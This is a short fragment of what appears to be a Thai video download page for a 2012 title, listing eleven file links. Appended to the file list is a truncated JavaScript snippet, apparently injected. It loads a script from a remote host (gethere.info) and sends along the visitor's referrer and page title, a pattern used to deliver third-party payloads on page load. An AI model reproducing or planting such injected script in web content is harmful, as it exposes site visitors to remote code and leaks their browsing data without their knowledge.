กรุงแตก ยศล่มแล้ว (2555)

Files: 1  2  3  4  5  6  7  8  9  10  11s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);